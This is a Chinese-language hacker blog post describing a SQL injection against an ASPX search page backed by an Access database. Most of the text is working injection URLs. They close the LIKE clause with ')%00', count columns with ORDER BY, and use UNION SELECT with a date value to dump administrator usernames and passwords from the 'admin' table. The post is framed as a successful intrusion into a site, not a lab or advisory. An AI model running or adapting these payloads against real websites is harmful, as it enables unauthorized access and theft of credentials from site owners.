和平常的 access 注入有点不一样的注入
By ay 暗影

死黑客kh 丢来一个注入点，说不能注入，然后我看了下，发现本次与以往的注入确实 不一样，之前没遇到过这种情况。
下面来说说我的注入过程。 一个 aspx 站：
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1
输入一个单引号，报错了，哟西。

由于惯性思维，之前的 aspx 站的注入点都是 MSSQL，然后本次注入点想当然的也以为 是 MSSQL，于是：
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1' and
1=(select name from sysobjects where xtype=char(85)) and '%'='
发现报错，奇怪了，怎么会错误呢？换语句测试
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1' and exists(select name from sysobjects where xtype=char(85)) and '%'='
 

我草，居然提示是 Jet 的，原来是 access 的数据库，法克，我说类…..和 kh 说了下，原 来他本来就说是 access 的，只是我没看到…..囧
之后就是想当然的，准备抓包，放到 ADV 里跑了，然后  刚开启抓包工具的时候，突然 想到了之前的单引号错误提示….
 
 

他的提示是 and (atitle like '%1'%' or acontent like '%1'%')')  在这里，并不是以 order by  结尾的
哦，然后我果断的放弃使用 ADV 注入辅助工具，输入 http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%00，嘿嘿，哟 西，没有报错，接下来就顺利了，直接 order by 了
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1') order by
7%00
到这里都很顺利，最后就是 union 了，然后问题出现了，
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%201,2,3,4,5,6,7%20from%20admin%20%00

 
我插，这是什么情况，字段不对？，重新 order by 了下，对的呀，是 7 个字段，然后仔细一 看，貌似是数据类型不同，是时间类型的数据。
然后输入
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%20null,null,null, null, null, null,null%20from%20admin%20%00
我插，还是不行，奇怪了，怎么会不行呢，明明都  null  了撒，然后百度了下，靠，原来是
access 里没有 null 这种数据类型我日他大爷的…
继续百度…把”string was not …..”这段文字直接输入百度里搜索终于有了眉目
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%201,name,pwd,4,5,6,'5/28/2008%2012:23:17%20PM'%20from%20admin%20%00
成功查询出管理员密码
 

然后我又看了下 access 的数据类型，然后发现可以用更简单的方法
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%201,name,pwd,4,5,6,date()%20from%20admin%20%00
更简单